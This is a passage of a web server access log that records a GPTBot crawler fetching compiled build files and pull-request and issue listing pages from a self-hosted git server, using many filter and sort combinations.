AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 24210] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:17:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 24188] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:17:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9949] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:17:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.53] [Sent-to 